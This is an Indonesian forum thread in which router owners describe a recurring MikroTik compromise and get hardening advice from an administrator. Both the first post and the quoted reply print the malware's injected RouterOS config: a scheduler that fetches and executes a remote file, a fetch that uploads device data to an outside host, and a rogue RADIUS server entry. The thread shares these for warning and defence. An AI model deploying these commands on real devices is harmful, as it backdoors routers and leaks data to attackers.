Follow us on...
Follow us on G+ Follow us on Twitter Follow us on Facebook Watch us on YouTube
Register
Results 1 to 3 of 3
  1. #1
    Status
    Offline
    lonthong2002's Avatar
    Member Senior
    Join Date
    Jul 2007
    Location
    Malang
    Posts
    402
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    1 (100%)

    apa sudah ada yang kena backdoor seperti ini ?

    Beberapa hari yang lalu salah satu router saya tidak bisa diakses dengan user dan login seperti biasanya ( router berjalan dengan normal )...
    untung masih ada user cadangan untuk login... setelah dicoba login pakai user cadangan bisa login..

    setelah login terlihat ada beberapa user admin yang lagi online... dari src banyak ip luar... ( kebanyakan ip dari rusia )
    waduh... kena hack deh pikir saya....
    segera dilakukan / system reset ,
    setelah di reset ... balik ke config default... dan saya lakukan setting ulang dan router bisa berfungsi seperti biasanya

    tapi setelah beberapa minggu kemudian , saya tidak bisa lagi akses router itu...
    terpaksa login pakai user cadangan lagi...

    setelah login ... weladalaaah... kejadian yang sama terjadi lagi... ada banyak user admin yang lagi login ...
    saya cek ada beberapa rule yang dibikin

    saya caritau dari forum lain.. ternyata sudah banyak yang mengalami hal seperti saya



    kejadian ini sama persis dengan yang saya alami....

    apakah ada rekan rekan disini yang mengalami hal serupa ?
    jangan dicoba script dibawah yaa....

    berikut copy paste dari forum lain

    Your story sounds similar to that of my own!.
    i seen one of my servers go offline which was depending on a nat filter to get it's proper external static ip.
    what ever it is. goes in and adds: new admin users, ppp radius connections, ip pools, scripts, masquerade rules to run every now and again and on startup which verifies the infection of the device re infects it if not infected and from what i can tell uploads it.. somewhere.....not sure how its getting in but it's nasty,

    i checked another Tick i know of and it was also affected....
    to no coincidence i seen a service tech hanging out of the local large WISP core he looked to be doing some "maintenance"

    below are some configs that were added by it.

    this happened on RB2011 6.41.4 & 6.42.3
    BST
    Code: Select all

    add name=ip owner=admin policy=\
    reboot,read,write,policy,test,password,sniff,sensi tive source="{/tool fetch \
    url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=bdee03097da1df40&actio\
    n=upload&sncode=D26B162F4AE05A0DF07BB92B3480114A&d ynamic=static\")}"
    /system scheduler
    add interval=10m name=autosupout on-event=":if ([/file find name=autosupout1.rif\
    ]=\"\") do={\r\
    \n:local ssip [:resolve jt.25u.com server=8.8.8.8]\r\
    \n/tool fetch url=\"http://\$ssip:81/autosupout1.rif\" dst-path=autosupout1.\
    rif\r\
    \n}\r\
    \nexecute [/file get autosupout1.rif contents]" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,s ensitive,romon \
    start-date=jan/01/1970 start-time=00:00:00
    add interval=30m name=a on-event=ip policy=\
    ftp,reboot,read,write,policy,test,password,sniff,s ensitive,romon \
    start-time=startup
    /ppp aaa
    set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes
    /radius
    add address=47.75.230.175 secret=test service=ppp
    /radius incoming
    set accept=yes

  2. #2
    Status
    Offline
    adhielesmana's Avatar
    Administrator
    Join Date
    Jan 2009
    Location
    http://www.adhielesmana.com
    Posts
    3,056
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Click here to enlarge Originally Posted by lonthong2002 Click here to enlarge
    Beberapa hari yang lalu salah satu router saya tidak bisa diakses dengan user dan login seperti biasanya ( router berjalan dengan normal )...
    untung masih ada user cadangan untuk login... setelah dicoba login pakai user cadangan bisa login..

    setelah login terlihat ada beberapa user admin yang lagi online... dari src banyak ip luar... ( kebanyakan ip dari rusia )
    waduh... kena hack deh pikir saya....
    segera dilakukan / system reset ,
    setelah di reset ... balik ke config default... dan saya lakukan setting ulang dan router bisa berfungsi seperti biasanya

    tapi setelah beberapa minggu kemudian , saya tidak bisa lagi akses router itu...
    terpaksa login pakai user cadangan lagi...

    setelah login ... weladalaaah... kejadian yang sama terjadi lagi... ada banyak user admin yang lagi login ...
    saya cek ada beberapa rule yang dibikin

    saya caritau dari forum lain.. ternyata sudah banyak yang mengalami hal seperti saya



    kejadian ini sama persis dengan yang saya alami....

    apakah ada rekan rekan disini yang mengalami hal serupa ?
    jangan dicoba script dibawah yaa....

    berikut copy paste dari forum lain

    Your story sounds similar to that of my own!.
    i seen one of my servers go offline which was depending on a nat filter to get it's proper external static ip.
    what ever it is. goes in and adds: new admin users, ppp radius connections, ip pools, scripts, masquerade rules to run every now and again and on startup which verifies the infection of the device re infects it if not infected and from what i can tell uploads it.. somewhere.....not sure how its getting in but it's nasty,

    i checked another Tick i know of and it was also affected....
    to no coincidence i seen a service tech hanging out of the local large WISP core he looked to be doing some "maintenance"

    below are some configs that were added by it.

    this happened on RB2011 6.41.4 & 6.42.3
    BST
    Code: Select all

    add name=ip owner=admin policy=\
    reboot,read,write,policy,test,password,sniff,sensi tive source="{/tool fetch \
    url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=bdee03097da1df40&actio\
    n=upload&sncode=D26B162F4AE05A0DF07BB92B3480114A&d ynamic=static\")}"
    /system scheduler
    add interval=10m name=autosupout on-event=":if ([/file find name=autosupout1.rif\
    ]=\"\") do={\r\
    \n:local ssip [:resolve jt.25u.com server=8.8.8.8]\r\
    \n/tool fetch url=\"http://\$ssip:81/autosupout1.rif\" dst-path=autosupout1.\
    rif\r\
    \n}\r\
    \nexecute [/file get autosupout1.rif contents]" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,s ensitive,romon \
    start-date=jan/01/1970 start-time=00:00:00
    add interval=30m name=a on-event=ip policy=\
    ftp,reboot,read,write,policy,test,password,sniff,s ensitive,romon \
    start-time=startup
    /ppp aaa
    set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes
    /radius
    add address=47.75.230.175 secret=test service=ppp
    /radius incoming
    set accept=yes
    coba upgrade ke versi terbaru dan matikan telnet ssh ftp service. rubah user password jangan pake user admin

  3. The Following User Says Thank You to adhielesmana For This Useful Post:


  4. #3
    Status
    Offline
    lonthong2002's Avatar
    Member Senior
    Join Date
    Jul 2007
    Location
    Malang
    Posts
    402
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    1 (100%)

    [solve]

    Click here to enlarge Originally Posted by adhielesmana Click here to enlarge
    coba upgrade ke versi terbaru dan matikan telnet ssh ftp service. rubah user password jangan pake user admin
    sudah dilakukan suhu.... terima kasih atas petunjuknya...
    Last edited by lonthong2002; 31-07-2018 at 10:44.

 

 

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. [ASK] ada yang mengalami problem ssh seperti ini engga yah
    By lonthong2002 in forum General Networking
    Replies: 5
    Last Post: 22-07-2012, 15:58
  2. Replies: 1
    Last Post: 12-12-2011, 07:03
  3. Apakah pernah ada yang kejadian seperti ini?
    By ahmad210993 in forum General Networking
    Replies: 5
    Last Post: 08-01-2011, 15:25
  4. Apa yang terjadi kalau seperti ini
    By deska in forum Wireless Networking
    Replies: 25
    Last Post: 30-12-2009, 12:53
  5. Ada yang kena Flooding Kek gini gak dari LAN
    By manggatal in forum Chit Chat
    Replies: 4
    Last Post: 29-11-2009, 05:02

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •